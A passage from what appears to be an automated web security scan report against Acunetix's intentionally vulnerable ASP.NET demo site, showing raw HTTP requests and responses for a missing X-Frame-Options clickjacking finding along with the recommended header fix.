          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        20. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
